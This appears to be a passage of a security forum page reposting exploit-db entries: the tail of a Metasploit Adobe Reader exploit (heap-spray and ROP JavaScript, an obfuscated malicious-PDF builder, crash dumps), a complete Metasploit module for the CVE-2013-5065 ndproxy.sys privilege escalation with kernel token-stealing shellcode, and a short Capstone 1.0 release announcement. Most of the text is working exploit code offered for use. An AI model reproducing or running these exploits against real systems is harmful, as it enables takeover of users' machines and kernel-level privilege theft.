ccc; var i3 = (0x1020 - 0x08) / 2; var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; return; } var shellcode = unescape("#{escaped_payload}"); var executable = ""; var rop10 = unescape("#{rop_10}"); var rop11 = unescape("#{rop_11}"); var r11 = false; var vulnerable = true; var obj_size; var rop; var ret_addr; var rop_addr; var r_addr; if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { obj_size = 0x360 + 0x1c; rop = rop10; rop_addr = unescape("%u08e4%u0c0c"); r_addr = 0x08e4; ret_addr = unescape("%ua8df%u4a82"); } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { r11 = true; obj_size = 0x370; rop = rop11; rop_addr = unescape("%u08a8%u0c0c"); r_addr = 0x08a8; ret_addr = unescape("%u8003%u4a84"); } else { vulnerable = false; } if (vulnerable) { var payload = rop + shellcode; heapSpray(payload, ret_addr, r_addr); var part1 = ""; if (!r11) { for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); } part1 += rop_addr; var part2 = ""; var part2_len = obj_size - part1.length * 2; for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); var arr = new Array(); removeButtonFunc = function () { app.removeToolButton({ cName: "evil" }); for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); } addButtonFunc = function () { app.addToolButton({ cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();" }); } app.addToolButton({ cName: "evil", cExec: "1", cEnable: "addButtonFunc();" }); } | js end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj \n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) #return str result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(js) xref = [] eol = "\n" endobj = "endobj" << eol # Randomize PDF version? pdf = "%PDF-1.5" << eol pdf << "%" << RandomNonASCIIString(4) << eol # catalog xref << pdf.length pdf << ioDef(1) << nObfu("<<") << eol pdf << nObfu("/Pages ") << ioRef(2) << eol pdf << nObfu("/Type /Catalog") << eol pdf << nObfu("/OpenAction ") << ioRef(4) << eol # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load pdf << nObfu("/AcroForm ") << ioRef(6) << eol pdf << nObfu(">>") << eol pdf << endobj # pages array xref << pdf.length pdf << ioDef(2) << nObfu("<<") << eol pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol pdf << nObfu("/Count 1") << eol pdf << nObfu("/Type /Pages") << eol pdf << nObfu(">>") << eol pdf << endobj # page 1 xref << pdf.length pdf << ioDef(3) << nObfu("<<") << eol pdf << nObfu("/Parent ") << ioRef(2) << eol pdf << nObfu("/Type /Page") << eol pdf << nObfu(">>") << eol # end obj dict pdf << endobj # js action xref << pdf.length pdf << ioDef(4) << nObfu("<<") pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) pdf << nObfu(">>") << eol pdf << endobj # js stream xref << pdf.length compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) pdf << ioDef(5) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol pdf << "stream" << eol pdf << compressed << eol pdf << "endstream" << eol pdf << endobj ### # The following form related data is required to get icucnv36.dll / icucnv40.dll to load ### # form object xref << pdf.length pdf << ioDef(6) pdf << nObfu("<</XFA ") << ioRef(7) << nObfu(">>") << eol pdf << endobj # form stream xfa = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> <present><pdf><interactive>1</interactive></pdf></present> </config> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> <subform name="form1" layout="tb" locale="en_US"> <pageSet></pageSet> </subform></template></xdp:xdp> EOF xref << pdf.length pdf << ioDef(7) << nObfu("<</Length %s>>" % xfa.length) << eol pdf << "stream" << eol pdf << xfa << eol pdf << "endstream" << eol pdf << endobj ### # end form stuff for icucnv36.dll / icucnv40.dll ### # trailing stuff xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << eol pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol pdf end end =begin * crash Adobe Reader 10.1.4 First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 AcroRd32_60000000!PDFLTerm+0xbb7cd: 604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? * crash Adobe Reader 11.0.2 (940.d70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 AcroRd32_60000000!DllCanUnloadNow+0x1493ae: 60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? =end Sursa: http://www.exploit-db.com/exploits/30394/
  24. [h=1]Microsoft Windows ndproxy.sys Local Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'ryujin', # python PoC 'Shahin Ramezany', # C PoC 'juan vazquez' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ], [ 'Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct '_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct '_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct '_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct } ], [ 'Windows Server 2003 SP2', { 'HaliQuerySystemInfo' => 0x1fa1e, '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ] ], 'References' => [ [ 'CVE', '2013-5065' ], [ 'OSVDB' , '100368'], [ 'BID', '63971' ], [ 'EDB', '30014' ], [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'], [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ], [ 'URL', 'http://www.secniu.com/blog/?p=53' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ], [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ] ], 'DisclosureDate'=> 'Nov 27 2013', 'DefaultTarget' => 0 })) end def add_railgun_functions session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) session.railgun.add_function( 'ntdll', 'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ], [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ]) session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ]) session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"] ]) session.railgun.add_function( 'psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"] ]) end def open_device(dev) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0) handle = r['return'] if handle == invalid_handle_value return nil end return handle end def find_sys_base(drvname) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil if current_drvname.downcase.include?('krnl') return [address, current_drvname] end elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end return nil end def ring0_shellcode(t) restore_ptrs = "\x31\xc0" # xor eax, eax restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax tokenstealing = "\x52" # push edx # Save edx on the stack tokenstealing << "\x53" # push ebx # Save ebx on the stack tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS tokenstealing << "\x8b\xc8" # mov ecx, eax tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) tokenstealing << "\x75\xe8" # jne 0000101e ====================== tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS tokenstealing << "\x5b" # pop ebx # Restores ebx tokenstealing << "\x5a" # pop edx # Restores edx tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! ring0_shellcode = restore_ptrs + tokenstealing return ring0_shellcode end def fill_memory(proc, address, length, content) result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil else vprint_good("Contents successfully written to 0x#{address.to_s(16)}") end return address end def create_proc windir = expand_path("%windir%") cmd = "#{windir}\\System32\\notepad.exe" # run hidden begin proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) rescue Rex::Post::Meterpreter::RequestError # when running from the Adobe Reader sandbox: # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. return nil end return proc.pid end def disclose_addresses(t) addresses = {} vprint_status("Getting the Kernel module name...") kernel_info = find_sys_base(nil) if kernel_info.nil? vprint_error("Failed to disclose the Kernel module name") return nil end vprint_good("Kernel module found: #{kernel_info[1]}") vprint_status("Getting a Kernel handle...") kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) kernel32_handle = kernel32_handle['return'] if kernel32_handle == 0 vprint_error("Failed to get a Kernel handle") return nil end vprint_good("Kernel handle acquired") vprint_status("Disclosing the HalDispatchTable...") hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable") hal_dispatch_table = hal_dispatch_table['return'] if hal_dispatch_table == 0 vprint_error("Failed to disclose the HalDispatchTable") return nil end hal_dispatch_table -= kernel32_handle hal_dispatch_table += kernel_info[0] addresses["halDispatchTable"] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}") vprint_status("Getting the hal.dll Base Address...") hal_info = find_sys_base("hal.dll") if hal_info.nil? vprint_error("Failed to disclose hal.dll Base Address") return nil end hal_base = hal_info[0] vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses["HaliQuerySystemInfo"] = hali_query_system_information vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}") return addresses end def check vprint_status("Adding the railgun stuff...") add_railgun_functions if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Detected end handle = open_device("\\\\.\\NDProxy") if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) os = sysinfo["OS"] case os when /windows xp.*service pack 3/i return Exploit::CheckCode::Appears when /[2003|.net server].*service pack 2/i return Exploit::CheckCode::Appears when /windows xp/i return Exploit::CheckCode::Detected when /[2003|.net server]/i return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit vprint_status("Adding the railgun stuff...") add_railgun_functions if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end my_target = nil if target.name =~ /Automatic/ print_status("Detecting the target system...") os = sysinfo["OS"] if os =~ /windows xp.*service pack 3/i my_target = targets[1] print_status("Running against #{my_target.name}") elsif ((os =~ /2003/) and (os =~ /service pack 2/i)) my_target = targets[2] print_status("Running against #{my_target.name}") elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i)) my_target = targets[2] print_status("Running against #{my_target.name}") end else my_target = target end if my_target.nil? fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually") end print_status("Checking device...") handle = open_device("\\\\.\\NDProxy") if handle.nil? fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found") else print_good("\\\\.\\NDProxy found!") end print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...") @addresses = disclose_addresses(my_target) if @addresses.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.") else print_good("Addresses successfully disclosed.") end print_status("Storing the kernel stager on memory...") this_proc = session.sys.process.open kernel_shell = ring0_shellcode(my_target) kernel_shell_address = 0x1000 result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory") else print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}") end print_status("Storing the trampoline to the kernel stager on memory...") trampoline = "\x90" * 0x38 # nops trampoline << "\x68" # push opcode trampoline << [0x1000].pack("V") # address to push trampoline << "\xc3" # ret trampoline_addr = 0x1 result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing trampoline on memory") else print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}") end print_status("Storing the IO Control buffer on memory...") buffer = "\x00" * 1024 buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call buffer[28, 4] = [0x34].pack("V") # In order to trigger the vulnerable call buffer_addr = 0x0d0d0000 result = fill_memory(this_proc, buffer_addr, buffer.length, buffer) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory") else print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}") end print_status("Triggering the vulnerability, corrupting the HalDispatchTable...") magic_ioctl = 0x8fff23c8 # Values taken from the exploit in the wild, see references ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The exploitation wasn't successful") end p = payload.encoded print_good("Exploitation successful! Creating a new process and launching payload...") new_pid = create_proc if new_pid.nil? print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...") return end print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...") if execute_shellcode(p, nil, new_pid) print_good("Enjoy") else fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: http://www.exploit-db.com/exploits/30392/
  25. Capstone 1.0 disassembly framework release! From: Nguyen Anh Quynh <aquynh () gmail com> Date: Wed, 18 Dec 2013 12:42:20 +0800 Hi, We are excited to announce the 1.0 version for Capstone, the multi-arch, multi-platform disassembly framework you are longing for! Why this engine is unique? Capstone offers some unparalleled features: - Support all important hardware architectures: ARM, ARM64 (aka ARMv8), Mips & X86. - Clean/simple/lightweight/intuitive architecture-neutral API. - Provide details on disassembled instruction (called “decomposer” by others). - Provide some semantics of the disassembled instruction, such as list of implicit registers read & written. - Implemented in pure C language, with bindings for Python, Ruby, OCaml, C#, Java and GO available. - Native support for Windows & *nix (including MacOSX, Linux, *BSD platforms). - Thread-safe by design. - Distributed under the open source BSD license. For further information, see our website at Capstone - Ultimate disassembly framework Being infant 1.0, Capstone might be still buggy or cannot handle many malware tricks yet. But give it a chance and report your findings, so we can fix the issues in the next versions. Capstone is a very young project: the first line was written just 4 months ago. But we do hope that it will live a long life. The community support is critical for this little open source project! We would like show our gratitude to the beta testers for bug reports & code contributions during the beta phase! Their invaluable helps have been tremendous for us to keep this far. We would like to thank LLVM project, which Capstone is based on. Without the almighty LLVM, Capstone would not be existent! Last but not least, big thanks go to Coseinc for the generous sponsor for our project! Thanks, Quynh Sursa: Full Disclosure: Capstone 1.0 disassembly framework release!
×
×
  • Create New...